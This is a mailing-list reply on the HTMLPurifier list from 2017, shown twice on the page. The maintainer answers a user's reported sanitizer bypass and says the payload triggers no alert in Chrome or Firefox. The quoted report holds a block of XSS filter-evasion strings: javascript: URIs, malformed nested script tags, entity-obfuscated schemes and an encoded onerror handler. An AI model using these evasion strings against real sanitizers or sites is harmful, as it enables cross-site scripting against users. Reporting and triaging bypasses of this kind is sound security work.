Re: HTMLPurifier fails for this payload
28 views
Skip to first unread message
Edward Z. Yang
Jan 13, 2017, 7:00:33 AM1/13/17
to Arpan Patel, htmlpurifier
Hi Arpan,
When I put this HTML through http://htmlpurifier.org/demo.php,
I don't get an alert() on Chrome or Firefox. Is this a browser
specific bypass?
Edward
Excerpts from Arpan Patel's message of 2017-01-13 03:44:01 -0800:
> %3Cp%3E<IMG
> SRC=javascript:alert(String.fromCharCode(88,83,83))/><<SCRIPT>alert("XSS");//<</SCRIPT><IMG
> """><SCRIPT>alert("XSS")</SCRIPT>script>alert("Ahh, once again bypassed
> your system, sorry :( *evil laugh*");<<SCRIPT>alert("XSS");//<</SCRIPT><IMG
> """><SCRIPT>alert("XSS")</SCRIPT>/script><img
> SRC="jav%26#x09;ascript:alert('XSS');" style="height:512px;width:512px;"
> alt="human_head_reference_picture_front%20-%20Copy.jpg"
> />%3Cimg+onerror=%22sfs%22+aalt%3D%22%22+src%3D%22http%3A%2F%2Ffeeds.specificfeeds.com%2Fassets%2Fimages%2Fhuman_head_reference_picture_front%2520-%2520Copy.jpg%22+style%3D%22height%3A512px%3B+width%3A512px%22+%2F%3E%3C%2Fp%3E%0D%0A%0D%0A
>
When I put this HTML through http://htmlpurifier.org/demo.php,
I don't get an alert() on Chrome or Firefox. Is this a browser
specific bypass?
Edward
Excerpts from Arpan Patel's message of 2017-01-13 03:44:01 -0800:
> %3Cp%3E<IMG
> SRC=javascript:alert(String.fromCharCode(88,83,83))/><<SCRIPT>alert("XSS");//<</SCRIPT><IMG
> """><SCRIPT>alert("XSS")</SCRIPT>script>alert("Ahh, once again bypassed
> your system, sorry :( *evil laugh*");<<SCRIPT>alert("XSS");//<</SCRIPT><IMG
> """><SCRIPT>alert("XSS")</SCRIPT>/script><img
> SRC="jav%26#x09;ascript:alert('XSS');" style="height:512px;width:512px;"
> alt="human_head_reference_picture_front%20-%20Copy.jpg"
> />%3Cimg+onerror=%22sfs%22+aalt%3D%22%22+src%3D%22http%3A%2F%2Ffeeds.specificfeeds.com%2Fassets%2Fimages%2Fhuman_head_reference_picture_front%2520-%2520Copy.jpg%22+style%3D%22height%3A512px%3B+width%3A512px%22+%2F%3E%3C%2Fp%3E%0D%0A%0D%0A
>
Reply all
Reply to author
Forward
0 new messages